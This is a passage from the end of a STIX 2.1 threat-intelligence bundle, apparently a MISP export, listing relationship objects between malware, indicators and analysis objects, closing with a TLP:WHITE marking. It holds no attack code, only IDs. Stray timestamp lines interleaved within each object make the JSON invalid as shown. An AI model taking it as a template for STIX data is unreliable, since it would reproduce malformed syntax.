"source_ref": "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8",
"target_ref": "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--55d8e5a8-d2fd-4f7e-85ae-eec938dd410d",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:19:23.000Z",
"modified": "2019-06-01T08:19:23.000Z",
"relationship_type": "executes",
"source_ref": "indicator--f0280498-3ef9-436d-ab5f-41ce5352bca8",
"target_ref": "x-misp-object--5cf234e6-2cd4-43cc-8337-4fa1950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--00d63c2c-7766-4631-b4fc-f6ee684f8368",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:20:59.000Z",
"modified": "2019-06-01T08:20:59.000Z",
"relationship_type": "analysed-with",
"source_ref": "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f",
"target_ref": "x-misp-object--49e52bb6-f81f-4516-99e4-e2e04f1c0bc7"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--1a6cb2e6-bfdb-4e77-b5c7-a6ead29e34a8",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:22:04.000Z",
"modified": "2019-06-01T08:22:04.000Z",
"relationship_type": "connects-to",
"source_ref": "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f",
"target_ref": "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--40b561d5-1976-4f05-9e7a-499673ffd659",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:24:11.000Z",
"modified": "2019-06-01T08:24:11.000Z",
"relationship_type": "executes",
"source_ref": "indicator--bd7566b3-8da1-4830-9ee4-2d705598919f",
"target_ref": "x-misp-object--5cf235f9-14d0-4bcf-9d72-4b5f950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--738f0138-0374-45b7-8664-00085370a299",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:28:37.000Z",
"modified": "2019-06-01T08:28:37.000Z",
"relationship_type": "downloads",
"source_ref": "malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"target_ref": "indicator--5cf23717-673c-48de-9834-476d950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--6496c0e0-204b-4b7a-83c0-37b8e4d766fa",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:31:20.000Z",
"modified": "2019-06-01T08:31:20.000Z",
"relationship_type": "contains",
"source_ref": "malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"target_ref": "indicator--5cf237b6-06bc-4e57-ad7e-31bb950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--5e50743c-8193-4cbb-a7e5-84019278877f",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:39:09.000Z",
"modified": "2019-06-01T08:39:09.000Z",
"relationship_type": "contains",
"source_ref": "malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"target_ref": "indicator--5cf2397c-b0a0-475d-b764-4c2a950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--51506d5e-74d1-4cc9-88a3-aaebf0ba002f",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:42:17.000Z",
"modified": "2019-06-01T08:42:17.000Z",
"relationship_type": "abuses",
"source_ref": "malware--5cf236e8-c18c-45ff-852e-4be0950d210f",
"target_ref": "indicator--5cf23a31-1db8-4b41-81af-4416950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--b7090b3e-332a-4674-9057-ed0e4c8f85fd",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T08:35:54.000Z",
"modified": "2019-06-01T08:35:54.000Z",
"relationship_type": "contains",
"source_ref": "malware--5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
"target_ref": "indicator--5cf238a2-0e5c-447e-a584-4072950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--bab30b8c-f1b5-4fff-b7f5-36a20a0bd247",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T09:03:10.000Z",
"modified": "2019-06-01T09:03:10.000Z",
"relationship_type": "related-to",
"source_ref": "indicator--5cf23ef7-5138-4a1f-b773-4766950d210f",
"target_ref": "indicator--5cf22fbc-cecc-465b-a261-4385950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--77c6b2dd-eed7-4784-8e1f-22ee4a978e57",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T09:09:51.000Z",
"modified": "2019-06-01T09:09:51.000Z",
"relationship_type": "downloaded-from",
"source_ref": "indicator--5cf24083-6de0-42e3-9ae7-4129950d210f",
"target_ref": "indicator--5cf240b4-352c-40a3-8aba-40b5950d210f"
},
{
"type": "relationship",
"spec_version": "2.1",
2023-12-14 14:30:15 +00:00
"id": "relationship--81b16a52-9808-4b78-abbb-6255ed8ad8ee",
2023-04-21 14:44:17 +00:00
"created": "2019-06-01T09:18:00.000Z",
"modified": "2019-06-01T09:18:00.000Z",
"relationship_type": "abuses",
"source_ref": "x-misp-object--5cf241f4-75b0-43e7-80fe-4487950d210f",
"target_ref": "observed-data--5cf2421b-bba0-4844-8d28-43c9950d210f"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}